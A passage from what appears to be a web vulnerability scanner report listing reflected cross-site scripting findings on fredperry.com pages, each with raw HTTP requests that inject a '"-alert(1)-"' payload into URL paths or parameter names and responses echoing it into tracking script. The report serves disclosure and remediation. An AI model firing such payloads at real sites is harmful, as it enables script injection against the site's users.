Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/garmentcare46cd0"-alert(1)-"28805937ef9/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3ccgtno5td8a3ftph0l9no5fr4; expires=Tue, 09-Nov-2010 17:20:09 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/garmentcare46cd0"-alert(1)-"28805937ef9/");
//]]>
...[SNIP]...

1.240. http://www.fredperry.com/productinfo/garmentcare/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /productinfo/garmentcare/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a3c9"-alert(1)-"a1e63e7882e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /productinfo/garmentcare/?9a3c9"-alert(1)-"a1e63e7882e=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vnrisbkf447g71ipgtt5g80lq7; expires=Tue, 09-Nov-2010 17:19:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Garment
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/productinfo/garmentcare/?9a3c9"-alert(1)-"a1e63e7882e=1");
//]]>
...[SNIP]...

1.241. http://www.fredperry.com/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5db9"-alert(1)-"cbfb29d8f4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /saleb5db9"-alert(1)-"cbfb29d8f4b/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=916ls611rg8chlttk61e4d3rq3; expires=Tue, 09-Nov-2010 17:22:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/saleb5db9"-alert(1)-"cbfb29d8f4b/");
//]]>
...[SNIP]...

1.242. http://www.fredperry.com/sale/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /sale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62888"-alert(1)-"b62cca0ff19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale/?62888"-alert(1)-"b62cca0ff19=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:21:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rvpr52jaj3fnlthbsvplflfr57; expires=Tue, 09-Nov-2010 17:21:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Sale -
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/sale/?62888"-alert(1)-"b62cca0ff19=1");
//]]>
...[SNIP]...

1.243. http://www.fredperry.com/shops/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /shops/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b770"-alert(1)-"c5aafd3c260 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shops5b770"-alert(1)-"c5aafd3c260/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:22:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7j4qaa56qrrdappj2bqaoq9jj2; expires=Tue, 09-Nov-2010 17:22:10 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/shops5b770"-alert(1)-"c5aafd3c260/");
//]]>
...[SNIP]...

1.244. http://www.fredperry.com/shops/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /shops/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1313"-alert(1)-"76dcfd4c4ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shops/?c1313"-alert(1)-"76dcfd4c4ee=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:20:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=til5vppvfl3smgi3hrnqdo48h7; expires=Tue, 09-Nov-2010 17:20:14 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Our Sho
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/shops/?c1313"-alert(1)-"76dcfd4c4ee=1");
//]]>
...[SNIP]...

1.245. http://www.fredperry.com/site-map/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /site-map/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92156"-alert(1)-"81e165d4a2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site-map92156"-alert(1)-"81e165d4a2d/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:25:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qo6aq5frbvf38upse3suim6k05; expires=Tue, 09-Nov-2010 17:25:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/site-map92156"-alert(1)-"81e165d4a2d/");
//]]>
...[SNIP]...

1.246. http://www.fredperry.com/site-map/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /site-map/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79ccb"-alert(1)-"2a6cc699b53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site-map/?79ccb"-alert(1)-"2a6cc699b53=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:23:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=a4invcsiuo08imktuvfah4u0v5; expires=Tue, 09-Nov-2010 17:23:40 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Site Ma
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/site-map/?79ccb"-alert(1)-"2a6cc699b53=1");
//]]>
...[SNIP]...

1.247. http://www.fredperry.com/women/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0bde"-alert(1)-"e890c6a858c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womena0bde"-alert(1)-"e890c6a858c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:00:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g3709uchv23iga3tdnoju2fa24; expires=Tue, 09-Nov-2010 17:00:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womena0bde"-alert(1)-"e890c6a858c/");
//]]>
...[SNIP]...

1.248. http://www.fredperry.com/women/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa6ee"-alert(1)-"553b47cbfc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/?aa6ee"-alert(1)-"553b47cbfc3=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7uk429dmh07smkjlej1h69bn43; expires=Tue, 09-Nov-2010 17:00:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women -
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/?aa6ee"-alert(1)-"553b47cbfc3=1");
//]]>
...[SNIP]...

1.249. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7ca2"-alert(1)-"8d9664b6ac4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womenb7ca2"-alert(1)-"8d9664b6ac4/amy-winehouse-landing/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uav4qcl07q89lvv7o5u01co5o4; expires=Tue, 09-Nov-2010 17:04:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womenb7ca2"-alert(1)-"8d9664b6ac4/amy-winehouse-landing/");
//]]>
...[SNIP]...

1.250. http://www.fredperry.com/women/amy-winehouse-landing/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a60ae"-alert(1)-"0aeb64a8199 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse-landinga60ae"-alert(1)-"0aeb64a8199/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:04:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=5grts2msu40i2sei9s2rh51qq3; expires=Tue, 09-Nov-2010 17:04:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse-landinga60ae"-alert(1)-"0aeb64a8199/");
//]]>
...[SNIP]...

1.251. http://www.fredperry.com/women/amy-winehouse-landing/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse-landing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7af5"-alert(1)-"7367eb33b78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/amy-winehouse-landing/?c7af5"-alert(1)-"7367eb33b78=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hqde0icrv2qnj40gqcq584nbc3; expires=Tue, 09-Nov-2010 17:04:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Amy Win
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/amy-winehouse-landing/?c7af5"-alert(1)-"7367eb33b78=1");
//]]>
...[SNIP]...

1.252. http://www.fredperry.com/women/amy-winehouse/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/amy-winehouse/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fec6"-alert(1)-"0f7c2574e94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women8fec6"-alert(1)-"0f7c2574e94/amy-winehouse/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=mb073il2o1r8resr30jv271527; expires=Tue, 09-Nov-2010 17:10:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29355

